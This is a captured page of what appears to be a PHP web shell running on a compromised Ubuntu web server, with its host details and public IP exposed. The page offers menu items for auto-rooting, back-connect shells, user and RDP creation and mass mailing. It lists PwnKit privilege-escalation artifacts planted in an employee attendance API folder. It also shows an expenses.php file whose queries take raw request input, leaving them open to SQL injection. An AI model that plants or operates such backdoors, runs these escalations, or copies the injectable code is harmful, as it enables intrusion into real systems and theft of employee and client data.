Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.138.174.45
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
oums /
api /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.api.php
3.61
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
api_sendsms.php
1.08
KB
-rw-rw-r--
checkin.php
3.42
KB
-rw-r--r--
checkout.php
3.06
KB
-rw-r--r--
clientDet.php
2.42
KB
-rw-rw-r--
employeelist.php
599
B
-rw-rw-r--
expenses.php
4.93
KB
-rw-rw-r--
getAttendance.php
1.33
KB
-rwxr-xr-x
getAttnStatus.php
1.16
KB
-rw-r--r--
getDept.php
477
B
-rwxr-xr-x
getEmpAttListDetDaily.php
1.41
KB
-rwxr-xr-x
getEmpAttListSummary.php
1.45
KB
-rwxr-xr-x
getEmpListForLeave.php
1.16
KB
-rwxr-xr-x
getMyAttendanceList.php
983
B
-rwxr-xr-x
login.php
2.49
KB
-rwxr-xr-x
notification_disp.php
1.26
KB
-rw-r--r--
push.php
2.37
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
saveAbLeave.php
2.22
KB
-rwxr-xr-x
saveAttendace.php
3.18
KB
-rwxr-xr-x
sys_connect.php
702
B
-rwxr-xr-x
taskreminder.php
8.64
KB
-rw-rw-r--
updsalary.php
832
B
-rw-r--r--
workentry.php
9.19
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : expenses.php
<?php include("sys_connect.php"); $type = $_GET['type']; $user = $_GET['userType']; if($type == 'exp'){ if($user == '1000'){ $mysql = "select em.femplcode,em.femplname,em.fdeptcode,dp.fdeptname,dp.fdeptshrt from masempl em inner join masdept dp on em.fdeptcode = dp.fdeptcode where em.fexpnentr='T' and em.femplstat='T' order by em.femplname;"; } $res = mysqli_query($mycon, $mysql); $count = mysqli_num_rows($res); if($count>0){ $i=0; $data=[]; while($fetch = mysqli_fetch_assoc($res)){ $data[$i] = $fetch; $i++; } echo json_encode(array("error_code"=>0, "data"=>$data)); return; } } if($type == "loc"){ $empcode = $_GET['empcode']; $query = "select * from masdept where fdeptcode in (select fdeptcode from masempl where femplcode='{$empcode}');"; $res = mysqli_query($mycon, $query); $count = mysqli_num_rows($res); if($count>0){ $fetch = mysqli_fetch_assoc($res); echo json_encode(array("error_code"=>0, "data"=>$fetch)); return; }else{ echo json_encode(array("error_code"=>-1, "data"=>"No Location Found")); return; } } if($type == "desc"){ $query = "select fheaddesc from mashead;"; $res = mysqli_query($mycon,$query); $count = mysqli_num_rows($res); if($count > 0){ $data=[]; $i=0; while($fetch = mysqli_fetch_assoc($res)){ $data[$i] = $fetch; $i++; } echo json_encode(array("error_code"=>0, "data"=>$data)); return; } } if($type == "clnt"){ $query = "select fclntcode, fclntname, fclntshrt from masclient order by fclntname"; $res = mysqli_query($mycon, $query); $count = mysqli_num_rows($res); if($count>0){ $data=[]; $i=0; while($fetch = mysqli_fetch_assoc($res)){ $data[$i] = $fetch; $i++; } echo json_encode(array("error_code"=>0, "data"=>$data)); return; } } if($type == 'savexp'){ $date = $_POST['date']; $deptcode = $_POST['deptcode']; $clntcode = $_POST['clntcode']; $ptype = $_POST['ptype']; $desc = $_POST['desc']; $emplcode = $_POST['emplcode']; $amt = $_POST['amt']; $remarks = $_POST['remarks']; $upduser = $_POST['upduser']; $query = "insert into expenses(fexpndate, fdeptcode, femplcode, fclntcode, facnttype, fheaddesc, fexpnamnt, fexpnremk, fupdtuser, fupdttime) values('{$date}', '{$deptcode}', '{$emplcode}', '{$clntcode}', '{$ptype}', '{$desc}', '{$amt}', '{$remarks}', '{$emplcode}', now());"; $res = mysqli_query($mycon, $query); if($res){ echo json_encode(array("error_code"=>0, "data"=>"Data Saved")); return; }else{ echo json_encode(array("error_code"=>-1, "data"=>"Something Went Wrong...!")); return; } } if($type == 'data'){ $month = $_GET['month']; $year = $_GET['year']; $dept = $_GET['dept']; $emplcode = $_GET['emplcode']; $queryHead = "select fusertype from masempl where femplcode='{$emplcode}'"; $res = mysqli_query($mycon, $queryHead); $resRow = mysqli_fetch_assoc($res); $usertype = $resRow['fusertype']; $qry = "select fclntcode from masclient where fclntshrt = '{$dept}'"; $res = mysqli_query($mycon, $qry); $row = mysqli_fetch_assoc($res); $deptnt = $row['fclntcode']; if($dept == "ALL"){ $cond = " "; }else{ $cond = "and e.fdeptcode='{$deptnt}'"; } if($usertype === "admin"){ $cnd = ""; }else{ $cnd = "and e.femplcode = '{$emplcode}'"; } $query = "select e.*, femplname, date_format(fexpndate,'%d/%m/%Y')as fexpdate, fclntshrt from expenses e inner join masempl m on m.femplcode = e.femplcode and m.fdeptcode = e.fdeptcode inner join masclient c on c.fclntcode = e.fdeptcode where month(fexpndate) = '{$month}' and year(fexpndate) = '{$year}' {$cond} {$cnd} order by e.facnttype"; $res = mysqli_query($mycon, $query); $count = mysqli_num_rows($res); if($count > 0){ $data = []; $i = 0; while($row = mysqli_fetch_assoc($res)){ $data[$i] = $row; $i++; } echo json_encode(array("error_code"=>0, "data"=>$data)); return; } } ?>
Close
